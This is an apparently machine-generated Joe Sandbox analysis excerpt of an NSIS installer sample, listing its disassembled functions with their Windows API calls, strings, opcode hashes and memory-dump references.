                                                                      • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                      • API String ID: 1975747703-1115850852
                                                                      • Opcode ID: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
                                                                      • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                      • Opcode Fuzzy Hash: 123c00e8e8eae349a6b6ffc178d207f9f8b23400aead47fb4df4bed5afc77f76
                                                                      • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
                                                                      Function 004043CD Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CheckDlgButton.USER32(?,-0000040A,?), ref: 0040446B
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040447F
                                                                      • SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 0040449C
                                                                      • GetSysColor.USER32(?), ref: 004044AD
                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044BB
                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044C9
                                                                      • lstrlenW.KERNEL32(?), ref: 004044CE
                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044DB
                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044F0
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404549
                                                                      • SendMessageW.USER32(00000000), ref: 00404550
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040457B
                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045BE
                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045CC
                                                                      • SetCursor.USER32(00000000), ref: 004045CF
                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 004045E8
                                                                      • SetCursor.USER32(00000000), ref: 004045EB
                                                                      • SendMessageW.USER32(00000111,?,00000000), ref: 0040461A
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040462C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                      • String ID: DC@$N
                                                                      • API String ID: 3103080414-4075224758
                                                                      • Opcode ID: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                      • Instruction ID: 7c305bb631aa8564409a9791ba7e53f932479190766108f73685c8e55a50eb1d
                                                                      • Opcode Fuzzy Hash: 2da216cdb10da56fdc38759a2ba284d26a9c8f7b49192765219d3b76b1da507d
                                                                      • Instruction Fuzzy Hash: 3B61A0B1900209BFDF10AF60DD45AAA7B69FB85344F00843AF701B61E0D77DA951CF98
                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,?), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextW.USER32(00000000,007A7A20,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                      • Instruction ID: 0958fbfe94b1809001ec2c76305b3cf500f7264b01c73c256976ee1787a3906e
                                                                      • Opcode Fuzzy Hash: 218f2c87b148b58c94c6785b51cf5afc075c1faf60bc5df3e6f759b2377d660f
                                                                      • Instruction Fuzzy Hash: B1418C71800209AFCF058F95DE459AF7BB9FF45310F00842AF591AA1A0CB38D954DFA4
                                                                      Function 00405EE3 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,00000000,00000000,?,?,0040607E,?,?), ref: 00405F1E
                                                                      • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405F27
                                                                        • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D02
                                                                        • Part of subcall function 00405CF2: lstrlenA.KERNEL32(00000000,?,00000000,00405FD7,00000000,[Rename],00000000,00000000,00000000), ref: 00405D34
                                                                      • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F44
                                                                      • wsprintfA.USER32 ref: 00405F62
                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F9D
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405FAC
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
                                                                      • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 0040603A
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040604B
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406052
                                                                        • Part of subcall function 00405D8D: GetFileAttributesW.KERNEL32(007B6800,00402F1D,007B6800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                        • Part of subcall function 00405D8D: CreateFileW.KERNEL32(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                      • String ID: %ls=%ls$[Rename]
                                                                      • API String ID: 2171350718-461813615
                                                                      • Opcode ID: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
                                                                      • Instruction ID: 42876e8bd8e74e9ce15c52ab3024c97c29192655820983ae090f8c600f4dcad6
                                                                      • Opcode Fuzzy Hash: 8e2ef562050374cbdee482ce01d0fc4b650d83fac470073e0dfd2f2c2df1a008
                                                                      • Instruction Fuzzy Hash: 25312530240B156BD220BB218D48F6B3A9DEF86744F15003AFA42F62D1EA7DD8148ABD
                                                                      Function 0040336C Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorModeVersionlstrlen
                                                                      • String ID: NSIS Error$UXTHEME
                                                                      • API String ID: 758611499-110662866
                                                                      • Opcode ID: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                      • Instruction ID: a84716d26b240927f2f501cde0935ca932456bd970f48cf256b7861c77eac06c
                                                                      • Opcode Fuzzy Hash: 216c36faef8c5c050b55b88396924ad1417f673f7408521f9ddb59849cb913ab
                                                                      • Instruction Fuzzy Hash: FF218071500700ABD7207F61AE49B1B3AA8AB81705F01843FF981B62E2DF7D49558B6E
                                                                      Function 004046FF Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                      • lstrcmpiW.KERNEL32(007A69C0,007A1F20,00000000,?,?), ref: 00404866
                                                                      • lstrcatW.KERNEL32(?,007A69C0), ref: 00404872
                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                        • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                        • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                        • Part of subcall function 0040652B: CharPrevW.USER32(?,?,007B5800,007B5800,007B3000,00403347,007B5800,774D3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                      • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,?,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                        • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                        • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                        • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A
                                                                      • API String ID: 2624150263-3554254475
                                                                      • Opcode ID: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                      • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                      • Opcode Fuzzy Hash: f17bf99eb9744ef0591981256be4ea8978b4dd8b1bc8bb353c7e53d074d4b920
                                                                      • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                      Function 004062B9 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(007A69C0,00000400), ref: 004063FA
                                                                      • GetWindowsDirectoryW.KERNEL32(007A69C0,00000400,00000000,007A0F00,?,00405336,007A0F00,?), ref: 0040640D
                                                                      • SHGetSpecialFolderLocation.SHELL32(6S@,?,00000000,007A0F00,?,00405336,007A0F00,?), ref: 00406449
                                                                      • SHGetPathFromIDListW.SHELL32(?,007A69C0), ref: 00406457
                                                                      • CoTaskMemFree.OLE32(?), ref: 00406462
                                                                      • lstrcatW.KERNEL32(007A69C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                      • lstrlenW.KERNEL32(007A69C0,00000000,007A0F00,?,00405336,007A0F00,?), ref: 004064E0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                      • String ID: 6S@$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 717251189-2551480263
                                                                      • Opcode ID: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
                                                                      • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                      • Opcode Fuzzy Hash: 6ca7045f1a7671301313a85d8900d55d77a8c8edd744d26f36594b0d48a563bf
                                                                      • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
                                                                      Function 00404275 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404292
                                                                      • GetSysColor.USER32(00000000), ref: 004042D0
                                                                      • SetTextColor.GDI32(?,00000000), ref: 004042DC
                                                                      • SetBkMode.GDI32(?,?), ref: 004042E8
                                                                      • GetSysColor.USER32(?), ref: 004042FB
                                                                      • SetBkColor.GDI32(?,?), ref: 0040430B
                                                                      • DeleteObject.GDI32(?), ref: 00404325
                                                                      • CreateBrushIndirect.GDI32(?), ref: 0040432F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                      • Instruction ID: 595a5ac3551c8926a474018cd00e052a0643935c19338169816fcf7950983a94
                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                      • Instruction Fuzzy Hash: BD2135716007049FCB219F68DD48B5BBBF8AF81715B048A3EED96A26E0D734E944CB54
                                                                      Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                        • Part of subcall function 00405E6E: SetFilePointer.KERNEL32(?,00000000,00000000,?,?,00000000,?,?,0040262F,00000000,00000000,?,00000000,00000011), ref: 00405E84
                                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                      • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                      • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                      • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                      Function 0040312F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 114COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%$5
                                                                      • API String ID: 551687249-3328568109
                                                                      • Opcode ID: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
                                                                      • Instruction ID: 82e96eed204572331df772a9dc06b49ed9c909a247c3debab706571384c66a49
                                                                      • Opcode Fuzzy Hash: 2b12612690519de3068172d76ec2280cdcede413f29547579ccd35042eb19dae
                                                                      • Instruction Fuzzy Hash: 7841B171900209DBCB10DFA5DA84B9E7FB8AF44356F1442BBE915B72D0C7788B50CB99
                                                                      Function 004052FF Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(007A0F00), ref: 00405337
                                                                      • lstrlenW.KERNEL32(?,007A0F00), ref: 00405347
                                                                      • lstrcatW.KERNEL32(007A0F00,?,?,007A0F00), ref: 0040535A
                                                                      • SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                      • String ID:
                                                                      • API String ID: 2531174081-0
                                                                      • Opcode ID: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
                                                                      • Instruction ID: 8b92f55a8d4b67b8ae829402156b3fb25f72412c241cd3f1eea2d9b1658803e5
                                                                      • Opcode Fuzzy Hash: f9f97bae3afdd1c4f1ca6782e82fa35db0496c66d131c2d1178b0595b913afc0
                                                                      • Instruction Fuzzy Hash: 66216071900618BACB11AFA5DD859CFBF78EF85350F10846AF904B62A0C7B94A50CF98
                                                                      Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                      • GetMessagePos.USER32 ref: 00404BEC
                                                                      • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                      • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                      • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                      Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E11
                                                                      • MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
                                                                      • wsprintfW.USER32 ref: 00402E4C
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402E46
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                      • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                      • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                      • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                      Function 00406601 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406618
                                                                      • wsprintfW.USER32 ref: 00406653
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406667
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2585806664.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000003.00000002.2585761848.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585869101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2585927713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2586066742.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-1946221925
